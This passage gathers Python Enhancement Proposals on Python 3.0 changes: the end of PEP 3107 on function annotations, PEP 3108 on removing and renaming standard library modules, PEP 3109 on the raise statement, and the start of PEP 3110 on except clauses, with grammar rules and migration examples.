The pydoc module should display the function annotations when
displaying help for a function. The inspect module should change
to support annotations.
Relation to Other PEPs
Function Signature Objects (PEP 362)
Function Signature Objects should expose the function’s annotations.
The Parameter object may change or other changes may be warranted.
Implementation
A reference implementation has been checked into the py3k (formerly
“p3yk”) branch as revision 53170 [10].
Rejected Proposals
The BDFL rejected the author’s idea for a special syntax for adding
annotations to generators as being “too ugly” [2].
Though discussed early on ([5], [6]), including
special objects in the stdlib for annotating generator functions and
higher-order functions was ultimately rejected as being more
appropriate for third-party libraries; including them in the
standard library raised too many thorny issues.
Despite considerable discussion about a standard type
parameterisation syntax, it was decided that this should also be
left to third-party libraries. ([7],
[8], [9]).
Despite yet more discussion, it was decided not to standardize
a mechanism for annotation interoperability. Standardizing
interoperability conventions at this point would be premature.
We would rather let these conventions develop organically, based
on real-world usage and necessity, than try to force all users
into some contrived scheme. ([13], [14],
[15]).
References and Footnotes
[1]
Unless specifically stated, “function” is generally
used as a synonym for “callable” throughout this document.
[2]
https://mail.python.org/pipermail/python-3000/2006-May/002103.html
[3]
http://web.archive.org/web/20070730120117/http://oakwinter.com/code/typecheck/
[4]
http://web.archive.org/web/20070603221429/http://maxrepo.info/
[5]
https://mail.python.org/pipermail/python-3000/2006-May/002091.html
[6]
https://mail.python.org/pipermail/python-3000/2006-May/001972.html
[7]
https://mail.python.org/pipermail/python-3000/2006-May/002105.html
[8]
https://mail.python.org/pipermail/python-3000/2006-May/002209.html
[9]
https://mail.python.org/pipermail/python-3000/2006-June/002438.html
[10]
http://svn.python.org/view?rev=53170&view=rev
[11]
http://docs.python.org/reference/compound_stmts.html#function-definitions
[12]
https://mail.python.org/pipermail/python-3000/2006-May/001613.html
[13]
https://mail.python.org/pipermail/python-3000/2006-August/002895.html
[14]
https://mail.python.org/pipermail/python-ideas/2007-January/000032.html
[15]
https://mail.python.org/pipermail/python-list/2006-December/420645.html
[16]
http://www.python.org/idle/doc/idle2.html#Tips
[17]
http://www.jython.org/Project/index.html
[18]
http://www.codeplex.com/Wiki/View.aspx?ProjectName=IronPython
[19]
http://peak.telecommunity.com/PyProtocols.html
[20]
http://www.artima.com/weblogs/viewpost.jsp?thread=155123
[21]
http://www-128.ibm.com/developerworks/library/l-cppeak2/
[22]
http://rpyc.wikispaces.com/
[23]
http://docs.python.org/library/pydoc.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3107 – Function Annotations | Standards Track | This PEP introduces a syntax for adding arbitrary metadata annotations
to Python functions [1]. |
PEP 3108 – Standard Library Reorganization
Author:
Brett Cannon <brett at python.org>
Status:
Final
Type:
Standards Track
Created:
01-Jan-2007
Python-Version:
3.0
Post-History:
28-Apr-2008
Table of Contents
Abstract
Modules to Remove
Previously deprecated [done]
Platform-specific with minimal use [done]
IRIX
Mac-specific modules
Solaris
Hardly used [done]
Obsolete
Maintenance Burden
Modules to Rename
PEP 8 violations [done]
Merging C and Python implementations of the same interface
No public, documented interface [done]
Poorly chosen names [done]
Grouping of modules [done]
dbm package
html package
http package
tkinter package
urllib package
xmlrpc package
Transition Plan
Issues
For modules to be removed
In Python 3.0
In Python 2.6
Renaming of modules
Python 3.0
Python 2.6
Open Issues
Renaming of modules maintained outside of the stdlib
Rejected Ideas
Modules that were originally suggested for removal
Introducing a new top-level package
Introducing new packages to contain theme-related modules
References
Copyright
Note
The merging of profile/cProfile as of Python 3.3 did not
occur, and thus is considered abandoned (although it would be
acceptable to do in the future).
Abstract
Just like the language itself, Python’s standard library (stdlib) has
grown over the years to be very rich. But over time some modules
have lost their need to be included with Python. There has also been
an introduction of a naming convention for modules since Python’s
inception that not all modules follow.
Python 3.0 presents a chance to remove modules that do not have
long term usefulness. This chance also allows for the renaming of
modules so that they follow the Python style guide. This
PEP lists modules that should not be included in Python 3.0 or which
need to be renamed.
Modules to Remove
Guido pronounced that “silly old stuff” is to be deleted from the
stdlib for Py3K [8]. This is open-ended on purpose.
Each module to be removed needs to have a justification as to why it
should no longer be distributed with Python. This can range from the
module being deprecated in Python 2.x to being for a platform that is
no longer widely used.
This section of the PEP lists the various modules to be removed. Each
subsection represents a different reason for modules to be
removed. Each module must have a specific justification on top of
being listed in a specific subsection so as to make sure only modules
that truly deserve to be removed are in fact removed.
When a reason mentions how long it has been since a module has been
“uniquely edited”, it is in reference to how long it has been since a
checkin was done specifically for the module and not for a change that
applied universally across the entire stdlib. If an edit time is not
denoted as “unique” then it is the last time the file was edited,
period.
Previously deprecated [done]
PEP 4 lists all modules that have been deprecated in the stdlib.
The specified motivations mirror those listed in
PEP 4. All modules listed
in the PEP at the time of the first alpha release of Python 3.0 will
be removed.
The entire contents of lib-old will also be removed. These modules
have already been removed from the default import path but are kept in
the Python distribution for users who rely upon the code.
cfmfile
Documented as deprecated since Python 2.4 without an explicit
reason.
cl
Documented as obsolete since Python 2.0 or earlier.
Interface to SGI hardware.
md5
Supplanted by the hashlib module.
mimetools
Documented as obsolete in a previous version.
Supplanted by the email package.
MimeWriter
Supplanted by the email package.
mimify
Supplanted by the email package.
multifile
Supplanted by the email package.
posixfile
Locking is better done by fcntl.lockf().
rfc822
Supplanted by the email package.
sha
Supplanted by the hashlib package.
sv
Documented as obsolete since Python 2.0 or earlier.
Interface to obsolete SGI Indigo hardware.
timing
Documented as obsolete since Python 2.0 or earlier.
time.clock() gives better time resolution.
Platform-specific with minimal use [done]
Python supports many platforms, some of which are not widely used or
maintained.
And on some of these platforms there are modules that have limited use
to people on those platforms. Because of their limited usefulness it
would be better to no longer burden the Python development team with
their maintenance.
The modules mentioned below are documented. All undocumented modules
for the specified platforms will also be removed.
IRIX
The IRIX operating system is no longer produced [15].
Removing all modules from the plat-irix[56] directory has been deemed
reasonable because of this fact.
AL/al
Provides sound support on Indy and Indigo workstations.
Both workstations are no longer available.
Code has not been uniquely edited in three years.
cd/CD
CD drive control for SGI systems.
SGI no longer sells machines with IRIX on them.
Code has not been uniquely edited in 14 years.
cddb
Undocumented.
cdplayer
Undocumented.
cl/CL/CL_old
Compression library for SGI systems.
SGI no longer sells machines with IRIX on them.
Code has not been uniquely edited in 14 years.
DEVICE/GL/gl/cgen/cgensuport
GL access, which is the predecessor to OpenGL.
Has not been edited in at least eight years.
Third-party libraries provide better support (PyOpenGL [12]).
ERRNO
Undocumented.
FILE
Undocumented.
FL/fl/flp
Wrapper for the FORMS library [16]
FORMS has not been edited in 12 years.
Library is not widely used.
First eight hits on Google are for Python docs for fl.
fm
Wrapper to the IRIS Font Manager library.
Only available on SGI machines which no longer come with IRIX.
GET
Undocumented.
GLWS
Undocumented.
imgfile
Wrapper for SGI libimage library for imglib image files
(.rgb files).
Python Imaging Library provides read-only support [13].
Not uniquely edited in 13 years.
IN
Undocumented.
IOCTL
Undocumented.
jpeg
Wrapper for JPEG (de)compressor.
Code not uniquely edited in nine years.
Third-party libraries provide better support
(Python Imaging Library [13]).
panel
Undocumented.
panelparser
Undocumented.
readcd
Undocumented.
SV
Undocumented.
torgb
Undocumented.
WAIT
Undocumented.
Mac-specific modules
The Mac-specific modules are not well-maintained (e.g., the bgen
tool used to auto-generate many of the modules has never been
updated to support UCS-4). It is also not Python’s place to maintain
such a large amount of OS-specific modules. Thus all modules under
Lib/plat-mac and Mac are to be removed.
A stub module for proxy access will be provided for use by urllib.
_builtinSuites
Undocumented.
Package under lib-scriptpackages.
Audio_mac
Undocumented.
aepack
OSA support is better through third-party modules.
Appscript [18].
Hard-coded endianness which breaks on Intel Macs.
Might need to rename if Carbon package dependent.
aetools
See aepack.
aetypes
See aepack.
applesingle
Undocumented.
AppleSingle is a binary file format for A/UX.
A/UX no longer distributed.
appletrawmain
Undocumented.
appletrunner
Undocumented.
argvemulator
Undocumented.
autoGIL
Very bad model for using Python with the CFRunLoop.
bgenlocations
Undocumented.
buildtools
Documented as deprecated since Python 2.3 without an explicit
reason.
bundlebuilder
Undocumented.
Carbon
Carbon development has stopped.
Does not support 64-bit systems completely.
Dependent on bgen which has never been updated to support UCS-4
Unicode builds of Python.
CodeWarrior
Undocumented.
Package under lib-scriptpackages.
ColorPicker
Better to use Cocoa for GUIs.
EasyDialogs
Better to use Cocoa for GUIs.
Explorer
Undocumented.
Package under lib-scriptpackages.
Finder
Undocumented.
Package under lib-scriptpackages.
findertools
No longer useful.
FrameWork
Poorly documented.
Not updated to support Carbon Events.
gensuitemodule
See aepack.
ic
icglue
icopen
Not needed on OS X.
Meant to replace ‘open’ which is usually a bad thing to do.
macerrors
Undocumented.
MacOS
Would also mean the removal of binhex.
macostools
macresource
Undocumented.
MiniAEFrame
See aepack.
Nav
Undocumented.
Netscape
Undocumented.
Package under lib-scriptpackages.
OSATerminology
pimp
Undocumented.
PixMapWrapper
Undocumented.
StdSuites
Undocumented.
Package under lib-scriptpackages.
SystemEvents
Undocumented.
Package under lib-scriptpackages.
Terminal
Undocumented.
Package under lib-scriptpackages.
terminalcommand
Undocumented.
videoreader
No longer used.
W
No longer distributed with Python.
Solaris
SUNAUDIODEV/sunaudiodev
Access to the sound card on Sun machines.
Code not uniquely edited in over eight years.
Hardly used [done]
Some platform-independent modules are rarely used. There are a number of
possible explanations for this, including ease of reimplementation, a very
small audience, or lack of adherence to more modern standards.
audiodev
Undocumented.
Not edited in five years.
imputil
Undocumented.
Never updated to support absolute imports.
mutex
Easy to implement using a semaphore and a queue.
Cannot block on a lock attempt.
Not uniquely edited since its addition 15 years ago.
Only useful with the ‘sched’ module.
Not thread-safe.
stringold
Function versions of the methods on string objects.
Obsolete since Python 1.6.
Any functionality not in the string object or module will be moved
to the string module (mostly constants).
sunaudio
Undocumented.
Not edited in over seven years.
The sunau module provides similar abilities.
toaiff
Undocumented.
Requires sox library to be installed on the system.
user
Easily handled by allowing the application to specify its own
module name, check for its existence, and import it if found.
new
Just a rebinding of names from the ‘types’ module.
Can also call type built-in to get most types easily.
Docstring states the module is no longer useful as of revision
27241 (2002-06-15).
pure
Written before Pure Atria was bought by Rational which was then
bought by IBM (in other words, very old).
test.testall
From the days before regrtest.
Obsolete
Becoming obsolete signifies that either another module in the stdlib
or a widely distributed third-party library provides a better solution
for what the module is meant for.
Bastion/rexec [done]
Restricted execution / security.
Turned off in Python 2.3.
Modules deemed unsafe.
bsddb185 [done]
Superseded by bsddb3
Not built by default.
Documentation specifies that the “module should never be used
directly in new code”.
Available externally from PyPI.
Canvas [done]
Marked as obsolete in a comment by Guido since 2000
(see http://bugs.python.org/issue210677).
Better to use the Tkinter.Canvas class.
commands [done]
subprocess module replaces it (PEP 324).
Remove getstatus(), move rest to subprocess.
compiler [done]
Having to maintain both the built-in compiler and the stdlib
package is redundant [20].
The AST created by the compiler is available [19].
Mechanism to compile from an AST needs to be added.
dircache [done]
Negligible use.
Easily replicated.
dl [done]
ctypes provides better support for same functionality.
fpformat [done]
All functionality is supported by string interpolation.
htmllib [done]
Superseded by HTMLParser.
ihooks [done]
Undocumented.
For use with rexec which has been turned off since Python 2.3.
imageop [done]
Better support by third-party libraries
(Python Imaging Library [13]).
Unit tests relied on rgbimg and imgfile.
rgbimg was removed in Python 2.6.
imgfile slated for removal in this PEP.
linuxaudiodev [done]
Replaced by ossaudiodev.
mhlib [done]
Should be removed as an individual module; use mailbox
instead.
popen2 [done]
subprocess module replaces it (PEP 324).
sgmllib [done]
Does not fully parse SGML.
In the stdlib for support to htmllib which is slated for removal.
sre [done]
Previously deprecated; import re instead.
stat [TODO need to move all uses over to os.stat()]
os.stat() now returns a tuple with attributes.
Functions in the module should be made into methods for the object
returned by os.stat.
statvfs [done]
os.statvfs now returns a tuple with attributes.
thread [done]
People should use ‘threading’ instead.
Rename ‘thread’ to _thread.
Deprecate dummy_thread and rename _dummy_thread.
Move thread.get_ident over to threading.
Guido has previously supported the deprecation
[9].
urllib [done]
Superseded by urllib2.
Functionality unique to urllib will be kept in the
urllib package.
UserDict [done: 3.0] [TODO handle 2.6]
Not as useful since types can be a superclass.
Useful bits moved to the ‘collections’ module.
UserList/UserString [done]
Not useful since types can be a superclass.
Moved to the ‘collections’ module.
Maintenance Burden
Over the years, certain modules have become a heavy burden upon
python-dev to maintain. In situations like this, it is better for the
module to be given to the community to maintain to free python-dev to
focus more on language support and other modules in the standard
library that do not take up an undue amount of time and effort.
bsddb3
Externally maintained at
http://www.jcea.es/programacion/pybsddb.htm .
Consistent testing instability.
Berkeley DB follows a different release schedule than Python,
leading to the bindings not necessarily being in sync with what is
available.
Modules to Rename
Many modules existed in
the stdlib before PEP 8 came into existence. This has
led to some naming inconsistencies and namespace bloat that should be
addressed.
PEP 8 violations [done]
PEP 8 specifies that modules “should have short, all-lowercase names”
where “underscores can be used … if it improves readability”.
The use of underscores is discouraged in package names.
The following modules violate PEP 8 and are not somehow being renamed
by being moved to a package.
Current Name        Replacement Name
_winreg             winreg
ConfigParser        configparser
copy_reg            copyreg
Queue               queue
SocketServer        socketserver
Merging C and Python implementations of the same interface
Several interfaces have both a Python and C implementation. While it
is great to have a C implementation for speed with a Python
implementation as fallback, there is no need to expose the two
implementations independently in the stdlib. For Python 3.0 all
interfaces with two implementations will be merged into a single
public interface.
The C module is to be given a leading underscore to delineate the fact
that it is not the reference implementation (the Python implementation
is). This means that any semantic difference between the C and Python
versions must be dealt with before Python 3.0 or else the C
implementation will be removed until it can be fixed.
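The usual shape of such a merge (a simplified sketch of the pattern, not the actual stdlib source) is a pure Python module that pulls in the underscore-prefixed accelerator when it is available:
# pickle.py (sketch)
# ... pure Python definitions of dump(), load(), Pickler, and so on ...

try:
    from _pickle import *      # overwrite with the C accelerator, if built
except ImportError:
    pass                        # the Python definitions above remain in use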
One interface that is not listed below is xml.etree.ElementTree. This
is an externally maintained module and thus is not under the direct
control of the Python development team for renaming. See Open
Issues for a discussion on this.
pickle/cPickle [done]
Rename cPickle to _pickle.
Semantic completeness of C implementation not verified.
profile/cProfile [TODO]
Rename cProfile to _profile.
Semantic completeness of C implementation not verified.
StringIO/cStringIO [done]
Add the class to the ‘io’ module.
No public, documented interface [done]
There are several modules in the stdlib that have no defined public
interface. These modules exist as support code for other modules that
are exposed. Because they are not meant to be used directly they
should be renamed to reflect this fact.
Current Name        Replacement Name
markupbase          _markupbase
Poorly chosen names [done]
A few modules have names that were poorly chosen in hindsight. They
should be renamed so as to prevent their bad name from perpetuating
beyond the 2.x series.
Current Name        Replacement Name
repr                reprlib
test.test_support   test.support
Grouping of modules [done]
As the stdlib has grown, several areas within it have expanded to
include multiple modules (e.g., support for database files). It
thus makes sense to group related modules into packages.
dbm package
Current Name        Replacement Name
anydbm              dbm.__init__ [1]
dbhash              dbm.bsd
dbm                 dbm.ndbm
dumbdbm             dbm.dumb
gdbm                dbm.gnu
whichdb             dbm.__init__ [1]
[1]
dbm.__init__ can combine anydbm and whichdb since
the public API for both modules has no name conflict and the
two modules have closely related usage.
html package
Current Name        Replacement Name
HTMLParser          html.parser
htmlentitydefs      html.entities
http package
Current Name        Replacement Name
httplib             http.client
BaseHTTPServer      http.server [2]
CGIHTTPServer       http.server [2]
SimpleHTTPServer    http.server [2]
Cookie              http.cookies
cookielib           http.cookiejar
[2]
The http.server module can combine the specified modules
safely as they have no naming conflicts.
tkinter package
Current Name        Replacement Name
Dialog              tkinter.dialog
FileDialog          tkinter.filedialog [4]
FixTk               tkinter._fix
ScrolledText        tkinter.scrolledtext
SimpleDialog        tkinter.simpledialog [5]
Tix                 tkinter.tix
Tkconstants         tkinter.constants
Tkdnd               tkinter.dnd
Tkinter             tkinter.__init__
tkColorChooser      tkinter.colorchooser
tkCommonDialog      tkinter.commondialog
tkFileDialog        tkinter.filedialog [4]
tkFont              tkinter.font
tkMessageBox        tkinter.messagebox
tkSimpleDialog      tkinter.simpledialog [5]
turtle              tkinter.turtle
[4]
tkinter.filedialog can safely combine FileDialog and
tkFileDialog as there are no naming conflicts.
[5]
tkinter.simpledialog can safely combine SimpleDialog
and tkSimpleDialog as they have no naming conflicts.
urllib package
Originally this new package was to be named url, but because of
the common use of the name as a variable, it has been deemed better
to keep the name urllib and instead shift existing modules around
into a new package.
Current Name        Replacement Name
urllib2             urllib.request, urllib.error
urlparse            urllib.parse
urllib              urllib.parse, urllib.request, urllib.error [6]
robotparser         urllib.robotparser
[6]
The quoting-related functions from urllib will be added
to urllib.parse. urllib.URLopener and
urllib.FancyURLopener will be added to urllib.request
as long as the documentation for both modules is updated.
xmlrpc package
Current Name        Replacement Name
xmlrpclib           xmlrpc.client
DocXMLRPCServer     xmlrpc.server [3]
SimpleXMLRPCServer  xmlrpc.server [3]
[3]
The modules being combined into xmlrpc.server have no
naming conflicts and thus can safely be merged.
Transition Plan
Issues
Issues related to this PEP:
Issue 2775: Master tracking issue
Issue 2828: clean up undoc.rst
For modules to be removed
For module removals, it is easiest to remove the module first in
Python 3.0 to see where dependencies exist. This makes finding
code that (possibly) requires the suppression of the
DeprecationWarning easier.
In Python 3.0
Remove the module.
Remove related tests.
Remove all documentation (typically the module’s documentation
file and its entry in a file for the Library Reference).
Edit Modules/Setup.dist and setup.py if needed.
Run the regression test suite (using -uall); watch out for
tests that are skipped because an import failed for the removed
module.
Check in the change (with an appropriate Misc/NEWS entry).
Update this PEP noting that the 3.0 step is done.
In Python 2.6
Add the following code to the deprecated module if it is
implemented in Python as the first piece of executed code
(adjusting the module name and the warnings import as
needed):
from warnings import warnpy3k
warnpy3k("the XXX module has been removed in Python 3.0",
         stacklevel=2)
del warnpy3k
or the following if it is an extension module:
if (PyErr_WarnPy3k("the XXX module has been removed in "
"Python 3.0", 2) < 0)
return;
(the Python-Dev TextMate bundle, available from Misc/TextMate,
contains a command that will generate all of this for you).
Update the documentation. For modules with their own documentation
file, use the :deprecated: option with the module directive
along with the deprecated directive, stating the deprecation
is occurring in 2.6, but is for the module’s removal in 3.0:
.. deprecated:: 2.6
   The :mod:`XXX` module has been removed in Python 3.0.
For modules simply listed in a file (e.g., undoc.rst), use the
warning directive.
Add the module to the module deletion test in test_py3kwarn.
Suppress the warning in the module’s test code using
test.test_support.import_module(name, deprecated=True).
Check in the change with an appropriate Misc/NEWS entry (block
this checkin in py3k!).
Update this PEP noting that the 2.6 step is done.
Renaming of modules
Support in the 2to3 refactoring tool for renames will be used to help
people transition to new module names
[11]. Import statements will be rewritten so that only the import
statement and none of the rest of the code needs to be touched. This
will be accomplished by using the as keyword in import statements
to bind in the module namespace to the old name while importing based
on the new name (when the keyword is not already used, otherwise the
reassigned name should be left alone and only the module that is
imported needs to be changed). The fix_imports fixer is an
example of how to approach this.
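For instance (a sketch of the rewriting described above, not literal 2to3 output), a 2.6 module containing
import ConfigParser
cfg = ConfigParser.ConfigParser()
would be rewritten for 3.0 along the lines of
import configparser as ConfigParser
cfg = ConfigParser.ConfigParser()
so that only the import statement changes while the rest of the code keeps using the old name.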
Python 3.0
Update 2to3 in the sandbox to support the rename.
Use svn move to rename the module.
Update all import statements in the stdlib to use the new name
(use 2to3’s fix_imports fixer for the easiest solution).
Rename the module in its own documentation.
Update all references in the documentation from the old name to
the new name.
Run regrtest.py -uall to verify the rename worked.
Add an entry in Misc/NEWS.
Commit the changes.
Python 2.6
In the module’s documentation, add a note mentioning that the module is
renamed in Python 3.0:
.. note::
   The :mod:`OLDNAME` module has been renamed to :mod:`NEWNAME` in
   Python 3.0.
Commit the documentation change.
Block the revision in py3k.
Open Issues
Renaming of modules maintained outside of the stdlib
xml.etree.ElementTree not only does not meet PEP 8 naming standards
but it also has an exposed C implementation. It is an
externally maintained package, per PEP 360. A request will be
made for the maintainer to change the name so that it matches PEP 8
and hides the C implementation.
Rejected Ideas
Modules that were originally suggested for removal
asynchat/asyncore
Josiah Carlson has said he will maintain the modules.
audioop/sunau/aifc
Audio modules where the formats are still used.
base64/quopri/uu
All still widely used.
‘codecs’ module does not provide as nice of an API for basic
usage.
fileinput
Useful when having to work with stdin.
linecache
Used internally in several places.
nis
Testimonials from people that new installations of NIS are still
occurring
getopt
Simpler than optparse.
repr
Useful as a basis for overriding.
Used internally.
sched
Useful for simulations.
symtable/_symtable
Docs were written.
telnetlib
Really handy for quick-and-dirty remote access.
Some hardware supports using telnet for configuration and
querying.
Tkinter
Would prevent IDLE from existing.
No GUI toolkit would be available out of the box.
Introducing a new top-level package
It has been suggested that the entire stdlib be placed within its own
package. This PEP will not address this issue as it has its own
design issues (naming, does it deserve special consideration in import
semantics, etc.). Everything within this PEP can easily be handled if
a new top-level package is introduced.
Introducing new packages to contain theme-related modules
During the writing of this PEP it was noticed that certain themes
appeared in the stdlib. In the past people have suggested introducing
new packages to help collect modules that share a similar theme (e.g.,
audio). An Open Issue was created to suggest some new packages to
introduce.
In the end, though, not enough support could be pulled together to
warrant moving forward with the idea. Instead name simplification has
been chosen as the guiding force for PEPs to create.
References
[7]
Python Documentation: Global Module Index
(http://docs.python.org/modindex.html)
[8]
Python-Dev email: “Py3k release schedule worries”
(https://mail.python.org/pipermail/python-3000/2006-December/005130.html)
[9]
Python-Dev email: Autoloading?
(https://mail.python.org/pipermail/python-dev/2005-October/057244.html)
[10]
Python-Dev Summary: 2004-11-01
(http://www.python.org/dev/summary/2004-11-01_2004-11-15/#id10)
[11]
2to3 refactoring tool
(http://svn.python.org/view/sandbox/trunk/2to3/)
[12]
PyOpenGL
(http://pyopengl.sourceforge.net/)
[13]
Python Imaging Library (PIL)
(http://www.pythonware.com/products/pil/)
[14]
Twisted
(http://twistedmatrix.com/trac/)
[15]
SGI Press Release:
End of General Availability for MIPS IRIX Products – December 2006
(http://www.sgi.com/support/mips_irix.html)
[16]
FORMS Library by Mark Overmars
(ftp://ftp.cs.ruu.nl/pub/SGI/FORMS)
[17]
Wikipedia: Au file format
(http://en.wikipedia.org/wiki/Au_file_format)
[18]
appscript
(http://appscript.sourceforge.net/)
[19]
_ast module
(http://docs.python.org/library/ast.html)
[20]
python-dev email: getting compiler package failures
(https://mail.python.org/pipermail/python-3000/2007-May/007615.html)
Copyright
This document has been placed in the public domain.
| Final | PEP 3108 – Standard Library Reorganization | Standards Track | Just like the language itself, Python’s standard library (stdlib) has
grown over the years to be very rich. But over time some modules
have lost their need to be included with Python. There has also been
an introduction of a naming convention for modules since Python’s
inception that not all modules follow. |
PEP 3109 – Raising Exceptions in Python 3000
Author:
Collin Winter <collinwinter at google.com>
Status:
Final
Type:
Standards Track
Created:
19-Jan-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Grammar Changes
Changes to Builtin Types
Semantic Changes
Compatibility Issues
Implementation
References
Copyright
Abstract
This PEP introduces changes to Python’s mechanisms for raising
exceptions intended to reduce both line noise and the size of the
language.
Rationale
One of Python’s guiding maxims is “there should be one – and
preferably only one – obvious way to do it”. Python 2.x’s
raise statement violates this principle, permitting multiple
ways of expressing the same thought. For example, these statements
are equivalent:
raise E, V
raise E(V)
There is a third form of the raise statement, allowing arbitrary
tracebacks to be attached to an exception [1]:
raise E, V, T
where T is a traceback. As specified in PEP 344,
exception objects in Python 3.x will possess a __traceback__
attribute, admitting this translation of the three-expression
raise statement:
raise E, V, T
is translated to
e = E(V)
e.__traceback__ = T
raise e
Using these translations, we can reduce the raise statement from
four forms to two:
raise (with no arguments) is used to re-raise the active
exception in an except suite.
raise EXCEPTION is used to raise a new exception. This form has
two sub-variants: EXCEPTION may be an exception class or an
instance of an exception class; valid exception classes are
BaseException and its subclasses (PEP 352). If EXCEPTION
is a subclass, it will be called with no arguments to obtain
an exception instance. To raise anything else is an error.
There is a further, more tangible benefit to be obtained through this
consolidation, as noted by A.M. Kuchling [2].
PEP 8 doesn't express any preference between the
two forms of raise statements:
raise ValueError, 'blah'
raise ValueError("blah")
I like the second form better, because if the exception arguments
are long or include string formatting, you don't need to use line
continuation characters because of the containing parens.
The BDFL has concurred [3] and endorsed the
consolidation of the several raise forms.
Grammar Changes
In Python 3, the grammar for raise statements will change
from [1]
raise_stmt: 'raise' [test [',' test [',' test]]]
to
raise_stmt: 'raise' [test]
Changes to Builtin Types
Because of its relation to exception raising, the signature for the
throw() method on generator objects will change, dropping the
optional second and third parameters. The signature thus changes (PEP 342)
from
generator.throw(E, [V, [T]])
to
generator.throw(EXCEPTION)
Where EXCEPTION is either a subclass of BaseException or an
instance of a subclass of BaseException.
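A short sketch of the new call form (an invented example, not from the PEP):
def counter():
    try:
        yield 1
        yield 2
    except ValueError as exc:
        yield 'handled: %s' % exc

g = counter()
next(g)                          # -> 1
g.throw(ValueError('bad tick'))  # pass a single exception instance; -> 'handled: bad tick'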
Semantic Changes
In Python 2, the following raise statement is legal
raise ((E1, (E2, E3)), E4), V
The interpreter will take the tuple’s first element as the exception
type (recursively), making the above fully equivalent to
raise E1, V
As of Python 3.0, support for raising tuples like this will be
dropped. This change will bring raise statements into line with
the throw() method on generator objects, which already disallows
this.
Compatibility Issues
All two- and three-expression raise statements will require
modification, as will all two- and three-expression throw() calls
on generators. Fortunately, the translation from Python 2.x to
Python 3.x in this case is simple and can be handled mechanically
by Guido van Rossum’s 2to3 utility [4] using the raise and
throw fixers ([5], [6]).
The following translations will be performed:
Zero- and one-expression raise statements will be left
intact.
Two-expression raise statements will be converted from
raise E, V
to
raise E(V)
Two-expression throw() calls will be converted from
generator.throw(E, V)
to
generator.throw(E(V))
See point #5 for a caveat to this transformation.
Three-expression raise statements will be converted from
raise E, V, T
to
e = E(V)
e.__traceback__ = T
raise e
Three-expression throw() calls will be converted from
generator.throw(E, V, T)
to
e = E(V)
e.__traceback__ = T
generator.throw(e)
See point #5 for a caveat to this transformation.
Two- and three-expression raise statements where E is a
tuple literal can be converted automatically using 2to3’s
raise fixer. raise statements where E is a non-literal
tuple, e.g., the result of a function call, will need to be
converted manually.
Two- and three-expression raise statements where E is an
exception class and V is an exception instance will need
special attention. These cases break down into two camps:
raise E, V as a long-hand version of the zero-argument
raise statement. As an example, assuming F is a subclass
of E
try:
something()
except F as V:
raise F(V)
except E as V:
handle(V)
This would be better expressed as
try:
something()
except F:
raise
except E as V:
handle(V)
raise E, V as a way of “casting” an exception to another
class. Taking an example from
distutils.compiler.unixcompiler
try:
self.spawn(pp_args)
except DistutilsExecError as msg:
raise CompileError(msg)
This would be better expressed as
try:
self.spawn(pp_args)
except DistutilsExecError as msg:
raise CompileError from msg
Using the raise ... from ... syntax introduced in
PEP 344.
Implementation
This PEP was implemented in revision 57783 [7].
References
[1]
http://docs.python.org/reference/simple_stmts.html#raise
[2]
https://mail.python.org/pipermail/python-dev/2005-August/055187.html
[3]
https://mail.python.org/pipermail/python-dev/2005-August/055190.html
[4]
http://svn.python.org/view/sandbox/trunk/2to3/
[5]
http://svn.python.org/view/sandbox/trunk/2to3/fixes/fix_raise.py
[6]
http://svn.python.org/view/sandbox/trunk/2to3/fixes/fix_throw.py
[7]
http://svn.python.org/view/python/branches/py3k/Include/?rev=57783&view=rev
Copyright
This document has been placed in the public domain.
| Final | PEP 3109 – Raising Exceptions in Python 3000 | Standards Track | This PEP introduces changes to Python’s mechanisms for raising
exceptions intended to reduce both line noise and the size of the
language. |
PEP 3110 – Catching Exceptions in Python 3000
Author:
Collin Winter <collinwinter at google.com>
Status:
Final
Type:
Standards Track
Created:
16-Jan-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Grammar Changes
Semantic Changes
Compatibility Issues
2.6 - 3.0 Compatibility
Open Issues
Replacing or Dropping “sys.exc_info()”
Implementation
References
Copyright
Abstract
This PEP introduces changes intended to help eliminate ambiguities
in Python’s grammar, simplify exception classes, simplify garbage
collection for exceptions and reduce the size of the language in
Python 3.0.
Rationale
except clauses in Python 2.x present a syntactic ambiguity
where the parser cannot differentiate whether
except <expression>, <expression>:
should be interpreted as
except <type>, <type>:
or
except <type>, <name>:
Python 2 opts for the latter semantic, at the cost of requiring the
former to be parenthesized, like so
except (<type>, <type>):
As specified in PEP 352, the ability to treat exceptions
as tuples will be removed, meaning this code will no longer work
except os.error, (errno, errstr):
Because the automatic unpacking will no longer be possible, it is
desirable to remove the ability to use tuples as except targets.
As specified in PEP 344, exception instances in Python 3
will possess a __traceback__ attribute. The Open Issues section
of that PEP includes a paragraph on garbage collection difficulties
caused by this attribute, namely an “exception -> traceback ->
stack frame -> exception” reference cycle, whereby all locals are
kept in scope until the next GC run. This PEP intends to resolve
this issue by adding a cleanup semantic to except clauses in
Python 3 whereby the target name is deleted at the end of the
except suite.
In the spirit of “there should be one – and preferably only one
– obvious way to do it”, it is desirable to consolidate
duplicate functionality. To this end, the exc_value,
exc_type and exc_traceback attributes of the sys
module [1] will be removed in favor of
sys.exc_info(), which provides the same information. These
attributes are already listed in PEP 3100 as targeted
for removal.
Grammar Changes
In Python 3, the grammar for except statements will change
from [4]
except_clause: 'except' [test [',' test]]
to
except_clause: 'except' [test ['as' NAME]]
The use of as in place of the comma token means that
except (AttributeError, os.error):
can be clearly understood as a tuple of exception classes. This new
syntax was first proposed by Greg Ewing [2] and
endorsed ([2], [3]) by the BDFL.
Further, the restriction of the token following as from test
to NAME means that only valid identifiers can be used as
except targets.
Note that the grammar above always requires parenthesized tuples as
exception classes. That way, the ambiguous
except A, B:
which would mean different things in Python 2.x and 3.x – leading to
hard-to-catch bugs – cannot legally occur in 3.x code.
Semantic Changes
In order to resolve the garbage collection issue related to PEP 344,
except statements in Python 3 will generate additional bytecode to
delete the target, thus eliminating the reference cycle.
The source-to-source translation, as suggested by Phillip J. Eby
[5], is
try:
try_body
except E as N:
except_body
...
gets translated to (in Python 2.5 terms)
try:
try_body
except E, N:
try:
except_body
finally:
N = None
del N
...
An implementation has already been checked into the py3k (formerly
“p3yk”) branch [6].
Compatibility Issues
Nearly all except clauses will need to be changed. except
clauses with identifier targets will be converted from
except E, N:
to
except E as N:
except clauses with non-tuple, non-identifier targets
(e.g., a.b.c[d]) will need to be converted from
except E, T:
to
except E as t:
T = t
